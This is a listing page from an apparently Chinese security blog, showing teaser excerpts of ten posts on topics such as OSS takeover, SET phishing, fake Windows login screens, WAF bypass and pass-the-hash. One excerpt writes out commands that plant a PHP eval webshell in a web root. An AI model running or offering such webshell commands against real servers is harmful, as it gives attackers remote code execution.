网络安全 第3页
XSS社区是网络安全爱好者聚集地
从 js map 泄露到接管 OSS 对象存储-XSS博客

从 js map 泄露到接管 OSS 对象存储

现在 OSS 对象存储应用广泛,但开发者安全意识普遍较低,方便之余的同时也会随之带来一些安全风险。虽然本文的场景不是那种 APP 或者源码里面硬编码泄露的 AK 和 SK ,敏感信息虽然都放在了后端...
xss-admin的头像-XSS博客xss-admin11个月前
022715
社会工程 — 使用社会工程工具包 (SET) 进行网络钓鱼-XSS博客

社会工程 — 使用社会工程工具包 (SET) 进行网络钓鱼

免责声明!!! 本演示使用社会工程工具包 (SET) 工具仅用于教育目的。目的是提高人们对恶意行为者实施网络钓鱼攻击所采用技术的认识,并教育参与者如何识别和减轻此类威胁。 请参与者注意,未...
xss-admin的头像-XSS博客xss-admin11个月前
012314
记php命令执行写shell-XSS博客

记php命令执行写shell

php代码执行&命令执行 getshell echo PD9waHAgZXZhbCgkX1BPU1Rbd2hvYW1pXSk7Pz4=|base64 -d > /var/www/html/shell.php echo \<\?php eval\(\@\$_POST\[1\]\)\; \?\> >1.php bypass 绕过...
xss-admin的头像-XSS博客xss-admin1年前
014014
代码审计-TP5 框架及无框架变量覆盖反序列化-XSS博客

代码审计-TP5 框架及无框架变量覆盖反序列化

漏洞关键字 SQL 注入:select insert update mysql_query mysqli 等 文件上传:$_FILES,type=”file”,上传,move_uploaded_file() 等 XSS 跨站:print print_r echo sprintf die var_dump va...
xss-admin的头像-XSS博客xss-admin11个月前
017214
FakeLogonScreen – 伪造Windows登录屏幕以窃取密码-XSS博客

FakeLogonScreen – 伪造Windows登录屏幕以窃取密码

FakeLogonScreen是一个伪造Windows登录屏幕以获取用户密码的实用程序。输入的密码将根据Active Directory或本地计算机进行验证,以确保其正确,然后显示到控制台或保存到磁盘。 它可以通过简单...
xss-admin的头像-XSS博客xss-admin11个月前
020714
API 接口测试-XSS博客

API 接口测试

一、API 接口介绍 1.1 RPC(远程过程调用) 远程过程调用(英语:Remote Procedure Call,缩写为 RPC)是一个计算机通信协议。该协议允许运行于一台计算机的程序调用另一台计算机的子程序,而程...
xss-admin的头像-XSS博客xss-admin11个月前
016014
通过加密 Oracle 绕过身份验证-XSS博客

通过加密 Oracle 绕过身份验证

通过加密 Oracle 绕过身份验证
xss-admin的头像-XSS博客xss-admin10个月前
09814
CVE-2019-12937 ToaruOS权限提升分析-XSS博客

CVE-2019-12937 ToaruOS权限提升分析

ToaruOS是一套使用C语言编写的开源计算机操作系统,是一个由伊利诺伊大学计算机科学本科生开发的业余爱好操作系统。ToAruOS可在POSIX和x86架构上运行。ToAruOS的主要功能包括对进程和线程的支持...
xss-admin的头像-XSS博客xss-admin11个月前
010814
在没有源 IP 发现的情况下绕过 Cloudflare 的 SQL 注入过滤器!-XSS博客

在没有源 IP 发现的情况下绕过 Cloudflare 的 SQL 注入过滤器!

在这个项目中,我最初的方法是尝试通过发现网站的原始 IP 来绕过 WAF (Cloudflare)。当这被证明不成功时,我深入研究了 WAF 绕过技术并找到了解决方案。 由于特定的“www.XYZ.ac.in”网站容易受...
xss-admin的头像-XSS博客xss-admin11个月前
029714
哈希传递攻击-XSS博客

哈希传递攻击

一、背景: 在内网渗透过程中,当获取到某个管理员用户的密码 hash 值却无法解密时,可以通过哈希传递攻击(Pass The Hash)对内网其他机器进行横向渗透。 二、使用: 1、测试环境 域信息: 域...
xss-admin的头像-XSS博客xss-admin8个月前
08714